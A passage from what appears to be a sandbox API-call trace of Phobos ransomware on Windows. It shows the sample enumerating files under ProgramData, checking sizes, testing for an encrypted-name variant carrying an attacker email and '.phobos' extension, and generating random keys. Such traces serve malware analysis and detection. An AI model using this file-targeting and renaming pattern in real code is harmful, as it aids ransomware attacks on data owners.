(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.529] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.531] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14176) returned 1 [0122.531] CloseHandle (hObject=0x334) returned 1 [0122.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll")) returned 0x2020 [0122.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.532] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.532] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.533] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=47456) returned 1 [0122.533] CloseHandle (hObject=0x334) returned 1 [0122.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll")) returned 0x2020 [0122.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.533] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.533] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=235872) returned 1 [0122.533] CloseHandle (hObject=0x334) returned 1 [0122.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll")) returned 0x2020 [0122.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.534] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.534] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=294240) returned 1 [0122.534] CloseHandle (hObject=0x334) returned 1 [0122.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll")) returned 0x2020 [0122.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.535] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0122.590] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=49504) returned 1 [0122.590] CloseHandle (hObject=0x344) returned 1 [0122.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll")) returned 0x2020 [0122.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.590] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.590] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.590] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.599] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=544768) returned 1 [0122.599] CloseHandle (hObject=0x334) returned 1 [0122.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf")) returned 0x2020 [0122.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.599] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.600] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.600] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14134) returned 1 [0122.600] CloseHandle (hObject=0x334) returned 1 [0122.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms")) returned 0x20 [0122.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.601] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.601] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=110457) returned 1 [0122.601] CloseHandle (hObject=0x334) returned 1 [0122.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms")) returned 0x20 [0122.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.601] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.602] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=201833) returned 1 [0122.602] CloseHandle (hObject=0x334) returned 1 [0122.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma")) returned 0x20 [0122.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.603] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.606] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=139199) returned 1 [0122.606] CloseHandle (hObject=0x334) returned 1 [0122.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma")) returned 0x20 [0122.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.607] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.607] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.608] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=94457) returned 1 [0122.608] CloseHandle (hObject=0x334) returned 1 [0122.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma")) returned 0x20 [0122.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.608] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.628] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=237625) returned 1 [0122.628] CloseHandle (hObject=0x334) returned 1 [0122.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma")) returned 0x20 [0122.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.628] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.629] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.629] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=112353) returned 1 [0122.629] CloseHandle (hObject=0x334) returned 1 [0122.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma")) returned 0x20 [0122.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.629] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.631] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=94457) returned 1 [0122.631] CloseHandle (hObject=0x334) returned 1 [0122.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma")) returned 0x20 [0122.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.632] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.632] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=94457) returned 1 [0122.632] CloseHandle (hObject=0x334) returned 1 [0122.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma")) returned 0x20 [0122.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.632] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.644] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=139197) returned 1 [0122.644] CloseHandle (hObject=0x334) returned 1 [0122.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma")) returned 0x20 [0122.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.644] CreateFileW 